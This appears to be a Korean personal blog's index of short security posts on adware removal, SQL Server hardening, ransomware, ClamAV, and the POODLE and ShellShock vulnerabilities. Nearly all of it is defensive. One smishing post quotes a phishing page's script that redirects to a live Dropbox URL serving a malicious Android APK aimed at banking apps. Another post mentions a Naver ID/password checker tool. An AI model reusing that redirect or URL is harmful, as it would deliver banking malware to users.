Remove BrowserModifier:Win32/SupTab 간단하게 제거 하기

프로그램 추가 삭제에서 의심스러운 프로그램 제거 (OnlineMapFinder Internet Explorer Homepage and New Tab)

SQL Server 기본포트(1433)와 sa계정의 위험성

▷ Sql 서버가 감지되면 sa 계정으로 비밀번호를 조합하여 될때까지 무차별 대입공격 접속을 시도한다.

▷ 반드시 접속포트를 바꾸고 웹인경우 로컬만 접속이 가능하도록한다. ▷ sa 계정은 중지시켜 접속할수 없도록 한다.

▶ 이벤트 로그에서 중국IP의 접속사항을 파악 할 수 있다.

▶ 아이피를 추적해보면 중국IP란것을 알수 있다.

▶ 예제는 express버전 : 1433 포트 바꾸기 // 다른 […]

winserver 2012 ping 막기(IP제한)

▶ 개인, 공용 프로필 방화벽을 활성화 되어 있는지 확인한다. /안되어 있으면 활성화 시킨다.

▶ 파일 및 프린터 공유(에코 요청- ICMPv4-In) 규칙 사용안함으로 하면 완전히 Ping을 막을 수 있다 . ▶IP영역을 지정해서 특정아이피으로만 Ping 확인 할 수 있게 할 수 있다.

▶ cmd 에서 특정 IP으로만 ping 되는지 확인한다.

[…]

FOLIODETE.scr trojan

이메일에 첨부되는 FOLIODETE.scr Trojan 첨부된 악선코드 파일 : 함부로 클릭하지 마세요.

 

랜섬웨어 CryptoLocker 한글 사이트

랜섬웨어 CryptoLocker 한글 사이트 오픈 IT 강국이 이젠 IT 호갱이 되고 있음. 노대통령이 그립습니다.

랜섬웨어 CryptoLocker에 감염되었을 경우 복구 방법

아직 없음

안됨 랜섬웨어 CryptoLocker에 감염되었을 경우 복구 방법. 요즘건 안됩.

http://blog.naver.com/PostView.nhn?blogId=hahaj1&logNo=20200811063

1404UK_TPL_screen.zip 이메일 첨부파일

이메일제목 :Discount Structure 2015 내용: Please find attached a PDF copy of the 2015 price list and discount structure

1404UK_TPL_screen.zip 첨부파일 다운로드후 압축 풀면 1404UK_TPL_screen.exe 악성코드

midimapbits.dll 바이러스 삭제

v3lite 돌린다.

[linux] 백신 ClamAV

참조 : http://www.clamav.net/doc/install.html#Debian

참조 : http://auctionpro.co.kr/?p=2511

ubuntu

인스톨 sudo apt-get install clamav

검사 sudo clamscan -r /.

 

문서다운로드 : clamdoc

SSL 3 is dead, killed by the POODLE attack // 보인인증서 SSL3가 해킹당했다는 내용

해결됨

OpenSSL에서 발생한 메모리 고갈 취약점, 푸들(Poodle, Padding Oracle On Downloaded Legacy Encryption) 취약점 등 총 4개의 취약점을 보완한 보안업데이트를 발표

CVE-2014-3513 : DTLS SRTP 핸드쉐이크 메시지를 처리하는 중 발생하는 메모리 고갈 CVE-2014-3567 : SSL/TLS/DTLS 서버에서 session ticket 값을 받을 때 발생하는 메모리 CVE-2014-3566 : SL3.0에서 다운 그레이드를 통해 MITM(man-in-the-middle)공격을 가능하게 하는 Poodle(Padding Oracle On […]

9월 25일 발견된 Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169)

최근 9월 25일 발견된 Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169)에 대하여 안내 드립니다.

– 이름 : Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169) – 취약점 정보 : GNU bash 4.3 및 이전 버전 GNU bash 취약점을 이용하여 여러가지 공격 유형이 탐지되고 있음 ex) 백도어 생성, 악성코드 다운로드, 패스워드 파일 탈취, 웹쉘 생성, 파일 삭제, 시스템 […]

스마트폰 피싱 문자=> KB 은행 앱 해킹용

[법원] 민사소송 출석명령서입니다. 라고 문자 날라와서.

크롬으로 사이트 들어가 보니 <script>location.replace(‘https://www.dropbox.com/s/ev44e5vwd8joyac/16yk.apk?dl=1’);</script> 16yk.apk 파일 다운로드 되네요. 아이폰에는 안갈리겠고 안드로이드용 입니다.

털림 1.특정 SMS 계정 털림 (국내) 2. url.kr 사이트 ftp 털림 (국내) 3. dropbox.com ftp 털림 (해외 :미국)

소스 확인해보니 k b _ c a r d _ l a y o u t […]

win server FTP Event log

잘못된 ftp 계정으로 로그인 하면 시스템 로그 보안경고 1개 와 보안 실패감사 로그 2개가 생성된다.

시스템 이벤트번호는 100 보안이벤트 번호는 529와 680 이다.

Trojan/Win32.Necurs 바이러스 제거

하드때서 외장하드로 연결해 V3 돌리거나

MS 에서 하는 백신 한번 돌리면 검색 되고 치료 됩니다. http://www.microsoft.com/security/scanner/ko-kr/default.aspx

네이버 ID PASS 체크기

네이버가 제일 뚫기 쉬웠다는 고등학생이 개발한 프로그램

유튜브 에러 메시지 2014-02-18 오전 12:30

500 Internal Server Error

Sorry, something went wrong.

A team of highly trained monkeys has been dispatched to deal with this situation.

If you see them, show them this information:

AB38WEPjRsjGtF_WbdRYuSKjsmmYMSLBlVIpWq6ik0FqGZT29FbmtTa6fbLC 7UtU9NyPiQdfbKToDtdbp59GeiIPZJDarCHaAOCHPrBleFW8xYG5ctFQtjJc yWOQLSgw8te0xSABsez7pYu4NMpQsMK6yAtl9WenzOxknlv_4lpj_9qYbIUi AwibufC4Y-uMEHTxmjtNh_0pCUZsVLRo6eZT9b0iNr7yoc7NYYnE77V2kC2t MPE1Np_UleyZfhJCH4HgD26t9OrKObay1F0_-r26umamel1gZICWht5IEvB4 zGYOXslpCSYNFsbRMCDfjNju44kucCC7zvsI4WHE2vNGRG-wOQwcFCu10QeX p2HQ1kLDndZZdSPbXXy7wla65Bete75-O0WGmc7lChiKMsCT3WF0bSkRhlsy gJITH3xiUcDgc5e7avCHh_TgjB48OnVAdeDEYI2KeUYi9o9b4vhvPjXAMP2_ N1Qp-aniKAvaXcbvwA2wm3MsBx2MOHvdHDt1zgghdE1Yx6ir5MlEIrBIhx69 ZNasYHxAWiYnubNXeHFtv8Jnk7X1Nil0PyBWXyA8FxVneARJXmV1XB3KXhO7 __cojo0Q1HhqStBlvp3BMnpuIDYazB8dfuLXi08vD32bzfMMRRSnpwJ6C_Dw 498lYM4TMhYbbv2FMLSAFjhX6a7ggO0Za4JIUle9Ena7JYg9t_6tCdIP6Ytk xj5vzZUVwRl-29_TtQ0ai95rFzaNpn1TfJy6mweKO45TK-bH6PKy-F1nQqNY Q3RYLVbuuGbT1ZwWHTqAsrMIr7xCxiBS8VtCjr1BjQcPDECEYDyl1Uyx1dje uz7oXRus8dvkutbGlnoTzvRddvBc6eLZxaXrfMP9A3r9Pk09a1aUq8__RJ0Q tuQNLLKeYPShKprwlrZYkLfo2dd7KvzTxo9EMiR5RQaH0IfnY4JQq9rHNpX0 N0hCIWH7RlqK90p2q843kqiv1mClhhaxP5H_aBtLUUE3FHQm0I_B2e-MjWeL S5pjljHKuKAvJ8ZYFaxFHFjI33SnOMygNRHHuVEYhqR7CPswKrF0vn28LMWm Q0Lf2sTABTKBa5iW8zpSuTccEDpO8vEQ13FWJwV3lfuAcz1nH8KjCpoFsNLN vv5nHrvpHu8iQ9b2uC6v7RddCBSM1epNnBi9lcvdS57wQAOCroujc36aa8fM HEcQOqHxDhFbTvtoxbAH1x0EZtFrJPZ3G6oXWf_R9KNiS8XKdXnp6HhPJYBh eJNTr7twCowRNtIEDaPsz694AWeZs1XDaEIb4CuGOrVLlrepDcVm07e2Qtmu XrIMWBFz0br-FY5XdU1gElkr2eriEdasAUAEAbQ2mzGPvTnVHvWhSvuVn6R3 2Ipys9likMjnsGa-2jXBCMjnYxGcJNUuVReNYETXwlM2gCJsCg5GxnaAcqWO R00gbHjJ0tW39_ZlAAjRwDi35rugo7rH40fnM5Va_YlNGxjq5hhQYzeucvS6 […]

인터넷을 거꾸로 화살표 돌리면 [웹 페이지가 만료되었습니다.]

웹 페이지가 만료되었습니다.

가능성이 높은 원인: •이 웹 페이지의 로컬 복사본이 오래되었으므로 다시 다운로드해야 합니다.

가능한 해결 방법: 도구 모음의 [새로 고침] 단추를 클릭하여 페이지를 다시 로드하십시오. 페이지를 새로 고친 후에 특정 웹 페이지를 다시 탐색하거나 정보를 다시 입력해야 합니다.

추가 정보

이 문제가 계속되면 다음 방법을 시도해 보십시오.

1.Internet Explorer에서 [도구], [인터넷 옵션], [고급] […]

mapoo’s Blog :: iptables와 간단한 쉘스크립트를 이용한 중국발 IP 차단하기.

mapoo's Blog :: iptables와 간단한 쉘스크립트를 이용한 중국발 IP 차단하기..

은율이와 함께 : 해킹사태, 크롬+리눅스+해외백신+구글 조합으로 해결가능하다.

은율이와 함께 : 해킹사태, 크롬+리눅스+해외백신+구글 조합으로 해결가능하다..

[ubuntu] 리눅스용 바이러스 백신 – ClamAV

apt-get install clamav

ClamAV(Clam AntiVirus)는 공개용 백신으로 윈도우즈, 리눅스, OS X 용 버젼들이 있다. 실시간 탐지가 되지 않는 백신이므로 시스템을 주기적으로 스캐닝하여 바이러스를 탐지해야만 한다.

리눅스 시스템 운영시 크게 3가지 이유로 백신이 필요 할 수 있다. 1) 웹서버를 운영하는 경우 웹쉘 관련 스크립트(php, jsp)나 악성코드 등을 탐지 2) 윈도우즈 시스템을 위한 파일서버(SMB, FTP, 웹업로드)를 […]